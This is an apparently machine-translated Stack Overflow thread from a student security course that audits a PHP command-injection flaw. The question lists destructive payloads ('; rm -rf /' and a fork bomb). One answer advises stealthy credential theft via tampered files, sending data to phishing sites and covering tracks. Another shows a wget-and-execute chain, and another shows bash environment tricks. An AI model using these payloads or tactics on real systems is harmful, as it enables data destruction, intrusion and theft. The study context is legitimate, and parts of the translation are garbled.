对于我的网络安全课程,我们应该审核一个易受攻击的网站,并列出我们可以做的所有可能的事情。这是PHP代码中非常明显的漏洞。
$tool = $_POST['tool'];
$filename = $_POST['filename'];
$tooldir = './products/' . $tool;
$fullpath = './products/' . $tool .'/' . $filename;
$cmd = 'cat ' . $fullpath;
system("$cmd");
我现在有两个对我$filename
变量很明显。
; rm -rf /
; :(){:|:&};:
但我觉得除了kill all和forkbomb之外,我还可以在写作中包含更多有趣的内容。告诉我你最糟糕的Stack Overflow!
答案 0 :(得分:4)
你只关注那些不那么有趣的破坏性潜力,因为受害者可以从备份恢复。更好的办法是使用漏洞利用来查看您可以读取的内容并使用它来进入未检测到的系统。您可以阅读和修改的简单文件列表比简单地销毁所有文件更加强大和有用
例如,如果您发现接受密码的文件或具有错误权限的网页调用的javascript,您可以修改它们以向您提供此信息或将其发送到网上诱骗网站。您找到的嵌入式密码可用于了解如何更多地执行其他操作并理想地进入系统文件,以便您可以覆盖您的轨道。或者,如果你可以替换系统实用程序,那么你真的很金,因为你拥有王国的钥匙。
这样想。在物理世界中,快速识别(和消除)使受害者生病的病毒。当你破坏系统时,你希望人们继续去那里,所以他们甚至不知道他们有问题。
答案 1 :(得分:3)
wget https://raw.github.com/keroserene/rickrollrc/master/roll.sh &&
chmod +x roll.sh &&
./roll.sh
答案 2 :(得分:1)
为e(echo),i(mkdir),ou(触摸),...定义恶意函数
IFS='/bcdfghjklmnpqrstvwxz' function_that_will_execute_shell_with_your_environment_as_root
ls='() { echo Pwned; }' bash -c ls
您可以找到许多其他技巧here。